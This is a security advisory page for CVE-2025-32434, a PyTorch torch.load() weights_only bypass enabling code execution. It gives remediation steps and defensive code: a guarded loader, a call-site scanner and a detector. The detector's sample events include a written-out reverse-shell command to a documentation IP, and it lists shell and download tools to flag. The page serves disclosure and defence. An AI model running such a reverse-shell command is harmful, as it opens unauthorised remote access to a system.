CVE-2025-32434: PyTorch: RCE bypasses weights_only=True safe-load guard

GHSA-53q9-r3pm-6pq6 CRITICAL PoC AVAILABLE CISA: TRACK*
Published April 18, 2025
CISO Take

Any system that loads PyTorch checkpoints with torch.load() on torch 2.5.1 or earlier is exposed to remote code execution if an attacker can influence the file being loaded, even with the supposedly safe weights_only=True flag. Upgrade to torch >= 2.6.0 immediately; this is not optional. Treat all externally-sourced model files as untrusted inputs regardless of loading parameters until patched.

What is the risk?

CRITICAL. CVSS 9.8 with a vector of network-reachable, no authentication, no user interaction. Read that with one caveat: the trigger is still a torch.load() of an attacker-controlled file, so the exposure is every place an untrusted checkpoint can reach that call. The amplifying factor is deception: weights_only=True was the documented secure practice, so teams that followed security guidance are still exposed on torch < 2.6.0. Attack surface is enormous: model hubs, CI/CD pipelines pulling pre-trained weights, inference servers, and any MLOps workflow that loads .pt/.pth files. EPSS is currently under 2%, but a public PoC is already indexed (see Exploitation Status below), and the high profile of the bypass makes wider weaponization predictable.

What systems are affected?

Package   Ecosystem   Vulnerable Range   Patched
PyTorch   pip         < 2.6.0            2.6.0

Package profile (PyTorch, pip): 100.9K, OpenSSF 6.4, 22.7K dependents, pushed 2d ago, 11% patched, ~216d to patch

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
1.9%
chance of exploitation in 30 days
Higher than 77% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

Metric                     Value
Attack Vector (AV)         Network
Attack Complexity (AC)     Low
Privileges Required (PR)   None
User Interaction (UI)      None
Scope (S)                  Unchanged
Confidentiality (C)        High
Integrity (I)              High
Availability (A)           High

What should I do?

6 steps
  1. PATCH

    Upgrade torch to >= 2.6.0 immediately. Use the install command from the PyTorch install matrix for your CUDA/CPU build rather than a bare pip install --upgrade torch, which can pull an incompatible wheel, and confirm with python -c "import torch; print(torch.__version__)" in every environment (containers, CI images, notebook kernels), not only the developer machine. From 2.6.0 weights_only=True is also the default for torch.load().

  2. INVENTORY

    Identify all code paths that reach torch.load(), directly (grep the codebase for 'torch.load') and indirectly through library helpers that wrap it (for example torch.hub.load() and Hugging Face transformers' from_pretrained() on .bin checkpoints). On torch < 2.6.0 a call that already passes weights_only=True is still in scope; the flag is not a mitigation for this CVE.

  3. VALIDATE MODEL PROVENANCE

    Verify model artifacts before loading: pin the SHA-256 digest published by the model's maintainer (or recorded when your own pipeline produced the file), reject mismatches, and use signed artifacts where the registry supports them. Where a model is available as safetensors, prefer it over pickle-based .pt/.pth files, since the safetensors container carries tensors only and no executable content.

  4. SANDBOX

    Run model loading in isolated containers/VMs with no network egress and minimal filesystem access.

  5. DETECT

    Alert on unexpected network connections or child processes (shells, curl/wget, interpreters) spawned by model serving or training processes; a torch.load() that behaves as intended does neither.

  6. INTERIM WORKAROUND (if patching is delayed)

    Only load models from cryptographically verified, internal-only sources and block external model downloads at the network level.
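The patch, provenance and format checks from steps 1 to 3 fit naturally into one guarded load routine. The following is an added example written for this page, not code from the advisory or from PyTorch: it refuses to unpickle on a torch version older than 2.6.0, pins the artifact to a SHA-256 digest supplied out of band, classifies the file by magic bytes before anything is deserialized, and routes safetensors files to the safetensors loader instead of torch.load(). The version-parsing rule (pre-release builds count as unpatched), the fixture writer and the requirement that the safetensors package be installed are this example's own assumptions.

```python
import hashlib
import hmac
import json
import struct
from pathlib import Path

PATCHED = (2, 6, 0)  # first release with the fix for CVE-2025-32434


def parse_version(version):
    """'2.5.1+cu121' -> (2, 5, 1); only the first three numeric components count."""
    core = version.split("+", 1)[0]
    nums = []
    for piece in core.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        nums.append(int(digits or 0))
    return tuple(nums + [0] * (3 - len(nums)))


def torch_is_patched(version):
    """True only for a final release >= 2.6.0. Pre-release and nightly builds
    ('2.6.0a0', '2.7.0.dev20250301') are deliberately treated as unpatched."""
    core = version.split("+", 1)[0]
    if not all(part.isdigit() for part in core.split(".")):
        return False
    return parse_version(version) >= PATCHED


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sniff_format(path):
    """Classify a checkpoint by magic bytes without deserializing it.
    torch.save() has written a zip container (PK\\x03\\x04) since 1.6; older
    checkpoints are a raw pickle stream (0x80 then the protocol byte); a
    safetensors file starts with a little-endian u64 header length followed
    by a JSON object."""
    with open(path, "rb") as f:
        head = f.read(16)
    if head.startswith(b"PK\x03\x04"):
        return "torch_zip"
    if head[:1] == b"\x80":
        return "legacy_pickle"
    if len(head) >= 9:
        n = struct.unpack("<Q", head[:8])[0]
        if 0 < n < (1 << 30) and head[8:9] == b"{":
            return "safetensors"
    return "unknown"


def safetensors_header(path):
    """Return {name: {dtype, shape, data_offsets}} from a safetensors file.
    Safe to run on untrusted input: it is JSON parsing, nothing is executed."""
    with open(path, "rb") as f:
        (n,) = struct.unpack("<Q", f.read(8))
        header = json.loads(f.read(n))
    header.pop("__metadata__", None)
    return header


def write_safetensors(path, tensors):
    """Write a minimal safetensors file from {name: (dtype, shape, raw_bytes)}.
    Only used here to construct offline test fixtures."""
    header, blobs, offset = {}, [], 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": list(shape),
                        "data_offsets": [offset, offset + len(raw)]}
        blobs.append(raw)
        offset += len(raw)
    hdr = json.dumps(header).encode()
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(hdr)) + hdr + b"".join(blobs))


def load_checkpoint(path, pinned_sha256):
    """Guarded replacement for a bare torch.load(path, weights_only=True)."""
    path = Path(path)
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, pinned_sha256):
        raise ValueError(f"{path.name}: SHA-256 {actual} does not match the pinned digest")
    fmt = sniff_format(path)
    if fmt == "safetensors":
        from safetensors.torch import load_file  # assumes the safetensors package is installed
        return load_file(str(path), device="cpu")
    if fmt not in ("torch_zip", "legacy_pickle"):
        raise ValueError(f"{path.name}: unrecognized checkpoint format")
    import torch  # deferred so the checks above also run where torch is absent
    if not torch_is_patched(torch.__version__):
        raise RuntimeError(f"torch {torch.__version__} is affected by CVE-2025-32434; refusing to unpickle {path.name}")
    return torch.load(str(path), map_location="cpu", weights_only=True)
```

The digest check runs before the format sniff and the torch import on purpose: a file that fails provenance never reaches any parser, and the version gate sits directly in front of the only call that unpickles, so a stale torch in one container cannot be papered over by the flag.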

What does CISA's SSVC say?

Decision Track*
Exploitation none (CISA's enrichment value; the Exploitation Status section above, which also draws on PoC indexes, records a public PoC)
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 17 - Quality management system Article 9 - Risk management system for high-risk AI
ISO 42001
A.6.2.6 - AI supply chain security A.8.4 - AI system risk management during deployment
NIST AI RMF
GOVERN 1.1 - Policies and processes for AI risk MEASURE 2.5 - Risk metrics for AI components and dependencies
OWASP LLM Top 10
LLM03 - Training Data Poisoning / Supply Chain

Frequently Asked Questions

What is CVE-2025-32434?

Any system that loads PyTorch checkpoints with torch.load() on torch 2.5.1 or earlier is exposed to remote code execution if an attacker can influence the file being loaded, even with the supposedly safe weights_only=True flag. Upgrade to torch >= 2.6.0 immediately; this is not optional. Treat all externally-sourced model files as untrusted inputs regardless of loading parameters until patched.

Is CVE-2025-32434 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-32434, increasing the risk of exploitation.

How to fix CVE-2025-32434?

1. PATCH: Upgrade torch to >= 2.6.0 immediately (pip install --upgrade torch). 2. INVENTORY: Identify all code paths using torch.load() — grep codebase for 'torch.load'. 3. VALIDATE MODEL PROVENANCE: Implement cryptographic signing/verification of model artifacts before loading (e.g., model card checksums from official sources). 4. SANDBOX: Run model loading in isolated containers/VMs with no network egress and minimal filesystem access. 5. DETECT: Alert on unexpected network connections or subprocess spawns from model serving processes. 6. INTERIM WORKAROUND (if patching is delayed): Only load models from cryptographically verified, internal-only sources and block external model downloads at the network level.
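The INVENTORY step above asks for every torch.load() call site. A plain grep misses aliased imports and cannot tell you which calls already pass weights_only, which matters for triage after the upgrade. The scanner below is an added example for this page, not part of the advisory or of PyTorch: it parses source with the standard ast module (nothing is imported or executed), follows "import torch as ..." and "from torch import load as ..." aliases at module level, and records the weights_only argument of each hit. The sample source it scans is constructed here; the alias tracking is module-scope only, which is this example's own simplification.

```python
import ast
from pathlib import Path


class TorchLoadFinder(ast.NodeVisitor):
    """Collect torch.load() call sites and their weights_only argument."""

    def __init__(self, filename):
        self.filename = filename
        self.module_aliases = {"torch"}  # names bound to the torch module
        self.func_aliases = set()        # names bound directly to torch.load
        self.hits = []

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name == "torch":
                self.module_aliases.add(alias.asname or "torch")
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        if node.module == "torch":
            for alias in node.names:
                if alias.name == "load":
                    self.func_aliases.add(alias.asname or "load")
        self.generic_visit(node)

    def _is_torch_load(self, func):
        if isinstance(func, ast.Attribute) and func.attr == "load":
            return isinstance(func.value, ast.Name) and func.value.id in self.module_aliases
        return isinstance(func, ast.Name) and func.id in self.func_aliases

    def visit_Call(self, node):
        if self._is_torch_load(node.func):
            weights_only = None  # None: argument not passed (full pickle before 2.6.0)
            for kw in node.keywords:
                if kw.arg == "weights_only":
                    # A literal True/False is recorded; anything else is runtime-dependent
                    weights_only = kw.value.value if isinstance(kw.value, ast.Constant) else "dynamic"
            self.hits.append({"file": self.filename, "line": node.lineno,
                              "weights_only": weights_only})
        self.generic_visit(node)


def scan_source(src, filename="<string>"):
    finder = TorchLoadFinder(filename)
    finder.visit(ast.parse(src, filename=filename))
    return finder.hits


def scan_tree(root):
    """Walk a source tree; files that do not parse are skipped, not silently trusted."""
    hits = []
    for p in Path(root).rglob("*.py"):
        try:
            hits.extend(scan_source(p.read_text(encoding="utf-8"), str(p)))
        except SyntaxError:
            hits.append({"file": str(p), "line": 0, "weights_only": "unparseable"})
    return hits


# Constructed sample source covering the call shapes the scanner understands.
SAMPLE = '''
import torch
import torch as th
from torch import load as tload

ckpt = torch.load("model.pt")
state = th.load(path, map_location="cpu", weights_only=True)
other = tload(path, weights_only=False)
flag = cfg.safe
dyn = torch.load(path, weights_only=flag)
'''

if __name__ == "__main__":
    for hit in scan_source(SAMPLE, "sample.py"):
        print(f"{hit['file']}:{hit['line']} weights_only={hit['weights_only']}")
```

Every hit is in scope on torch < 2.6.0 regardless of the recorded flag; the flag column tells you which call sites still need weights_only=True (or a migration to safetensors) once the upgrade has landed.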

What systems are affected by CVE-2025-32434?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, transfer learning workflows, MLOps CI/CD pipelines, model registries and hubs.

What is the CVSS score for CVE-2025-32434?

CVE-2025-32434 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.88%.

What is the AI security impact?

Affected AI Architectures

model serving, training pipelines, transfer learning workflows, MLOps CI/CD pipelines, model registries and hubs

MITRE ATLAS Techniques

AML.T0002.001 Models
AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0058 Publish Poisoned Models
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 17, Article 9
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: GOVERN 1.1, MEASURE 2.5
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

PyTorch is a Python package that provides tensor computation with strong GPU acceleration and deep neural networks built on a tape-based autograd system. In version 2.5.1 and prior, a Remote Command Execution (RCE) vulnerability exists in PyTorch when loading a model using torch.load with weights_only=True. This issue has been patched in version 2.6.0.

Exploitation Scenario

Adversary publishes a malicious PyTorch model to a public hub (Hugging Face, GitHub, Kaggle), either a novel model or a trojanized version of a popular one (BERT, Llama, ResNet). A data scientist or MLOps pipeline downloads and loads it with torch.load(model_path, weights_only=True), trusting the flag to provide safety. The crafted serialization payload bypasses the weights_only restriction and executes arbitrary Python during deserialization. The adversary achieves RCE on the inference server or training node, establishes persistence, and pivots to training data, model IP, cloud credentials, or connected infrastructure. Where a serving API accepts user-supplied model or adapter files and loads them with torch.load(), the attack is remotely triggerable without the victim downloading anything by hand.
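The DETECT step in the fix list and the post-exploitation behaviour in this scenario share one observable: a serving process that was only ever supposed to read a file starts spawning shells or talking to hosts it has no business reaching. The detector below is an added example for this page, not part of the advisory: it applies two rules to process and socket events in a JSON shape assumed for an EDR or auditd forwarder, with the serving-process patterns, the egress allowlist and the five sample events all constructed here.

```python
import ipaddress
import json
import os

# Constructed configuration: how the model-serving process is recognised on this host.
SERVING_PATTERNS = ("serve.py", "torchserve", "uvicorn", "gunicorn")
# Child binaries a model server has no legitimate reason to execute.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "nc", "ncat", "curl", "wget", "perl"}
# Destinations the serving process is expected to reach (constructed allowlist).
ALLOWED_EGRESS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "127.0.0.0/8")]


def is_serving(cmdline):
    return any(pattern in (cmdline or "") for pattern in SERVING_PATTERNS)


def evaluate(event):
    """Return an alert dict for one event, or None when it is benign."""
    kind = event.get("type")
    # Rule 1: the serving process is the parent of a shell or download tool.
    if kind == "process" and is_serving(event.get("parent_cmdline")):
        child = os.path.basename(event.get("exe", ""))
        if child in SUSPICIOUS_CHILDREN:
            return {"pid": event["pid"], "rule": "shell_spawn", "detail": event.get("cmdline")}
    # Rule 2: the serving process opens a connection outside the allowlist.
    if kind == "socket" and is_serving(event.get("cmdline")):
        dst = ipaddress.ip_address(event["daddr"])
        if not any(dst in net for net in ALLOWED_EGRESS):
            return {"pid": event["pid"], "rule": "unexpected_egress",
                    "detail": f"{dst}:{event['dport']}"}
    return None


def detect(lines):
    """Run both rules over newline-delimited JSON events; returns the alerts raised."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = evaluate(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events: the server starting, a reverse shell spawned from it,
# the matching outbound connection, a legitimate database connection, and a
# harmless child process.
SAMPLE_EVENTS = '''
{"type":"process","pid":4242,"ppid":4100,"exe":"/usr/bin/python3","cmdline":"python3 serve.py --model /models/llm.pt","parent_cmdline":"/usr/bin/containerd-shim"}
{"type":"process","pid":4300,"ppid":4242,"exe":"/bin/sh","cmdline":"sh -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'","parent_cmdline":"python3 serve.py --model /models/llm.pt"}
{"type":"socket","pid":4242,"cmdline":"python3 serve.py --model /models/llm.pt","daddr":"203.0.113.7","dport":4444}
{"type":"socket","pid":4242,"cmdline":"python3 serve.py --model /models/llm.pt","daddr":"10.20.0.5","dport":5432}
{"type":"process","pid":4301,"ppid":4242,"exe":"/usr/bin/nvidia-smi","cmdline":"nvidia-smi","parent_cmdline":"python3 serve.py --model /models/llm.pt"}
'''

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS.splitlines()):
        print(alert)
```

Both rules are deliberately narrow so they stay quiet on a healthy server; the point is that a successful bypass of weights_only has to do something after the load, and that something is visible at the process and socket layer even when the file itself looked like plain weights.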

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 18, 2025
Last Modified
December 1, 2025
First Seen
April 18, 2025
